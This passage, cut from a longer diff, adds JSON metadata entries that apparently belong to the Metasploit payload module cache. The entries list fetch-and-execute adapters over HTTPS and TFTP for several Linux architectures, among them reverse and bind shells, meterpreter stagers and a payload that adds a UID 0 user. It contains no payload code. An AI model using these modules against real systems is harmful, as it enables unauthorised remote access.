payload from an HTTPS server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_bind_tcp_random_port": { + "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/https/x86/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Geyslan G. Bem ", + "Aleh Boitsau " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", + "EDB-41631" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_find_port": { + "name": "HTTPS Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/https/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_find_port", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_find_tag": { + "name": "HTTPS Fetch, Linux Command Shell, Find Tag Inline", + "fullname": "payload/cmd/linux/https/x86/shell_find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nSpawn a shell on an established connection (proxy/NAT safe)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_find_tag", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_reverse_tcp": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/https/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Ramon de C Valle ", + "joev " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/https/x86/shell_reverse_tcp_ipv6": { + "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/https/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Matteo Malvica " + ], + "description": "Fetch and execute an x86 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/https/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/https/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/https/x86", + "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", + "staged": false + }, + "payload_cmd/linux/tftp/aarch64/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack " + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/meterpreter", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/aarch64/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/aarch64/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/aarch64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/shell", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/tftp/aarch64/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/aarch64", + "adapted_refname": "linux/aarch64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armbe/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/armbe/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/armbe/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armbe/shell_bind_tcp": { + "name": "TFTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/tftp/armbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Balazs Bucsay @xoreipeip " + ], + "description": "Fetch and execute an ARMBE payload from a TFTP server.\nListen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armbe", + "adapted_refname": "linux/armbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armle/adduser": { + "name": "TFTP Fetch, Linux Add User", + "fullname": "payload/cmd/linux/tftp/armle/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/adduser", + "staged": false + }, + "payload_cmd/linux/tftp/armle/exec": { + "name": "TFTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/tftp/armle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nExecute an arbitrary command", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/exec", + "staged": false + }, + "payload_cmd/linux/tftp/armle/meterpreter/bind_tcp": { + "name": "TFTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/tftp/armle/meterpreter/reverse_tcp": { + "name": "TFTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/tftp/armle/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/armle/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/armle/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armle/shell/bind_tcp": { + "name": "TFTP Fetch, Linux dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/tftp/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/tftp/armle/shell/reverse_tcp": { + "name": "TFTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/tftp/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/tftp/armle/shell_bind_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ", + "hal" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect to target and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/armle/shell_reverse_tcp": { + "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/tftp/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ" + ], + "description": "Fetch and execute an ARMLE payload from a TFTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/armle", + "adapted_refname": "linux/armle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/tftp/mips64/meterpreter_reverse_http": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/tftp/mips64/meterpreter_reverse_https": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from a TFTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/tftp/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/tftp/mips64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/tftp/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/tftp/mips64/meterpreter_reverse_tcp": { + "name": "TFTP Fetch", + "fullname": "payload/cmd/linux/tftp/mips64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": 